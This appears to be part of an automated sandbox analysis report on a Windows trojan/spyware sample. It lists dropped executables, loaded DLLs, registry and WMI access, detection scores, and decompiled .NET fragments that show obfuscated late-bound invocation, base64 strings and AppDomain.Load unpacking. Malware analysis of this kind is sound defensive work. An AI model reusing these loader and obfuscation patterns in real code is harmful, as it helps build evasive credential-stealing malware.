Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
Source: FB_7D21.tmp.exe.0.dr, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.cs Base64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.cs Base64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.cs Base64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: FB_7BD8.tmp.exe.0.dr Binary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.I'&
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/2@2/4
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Code function: 0_2_00401000 FindResourceA,SizeofResource,LoadResource,LockResource,GetTempPathA,GetTempFileNameA,MoveFileExA,MoveFileExA,sprintf,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,FreeResource,MoveFileExA,ExitProcess, 0_2_00401000
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Mutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe File created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp Jump to behavior
Source: DJ5PhUwOsM.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DJ5PhUwOsM.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: DJ5PhUwOsM.exe ReversingLabs: Detection: 92%
Source: unknown Process created: C:\Users\user\Desktop\DJ5PhUwOsM.exe "C:\Users\user\Desktop\DJ5PhUwOsM.exe"
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Process created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe"
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Process created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe"
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Process created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe" Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Process created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe" Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
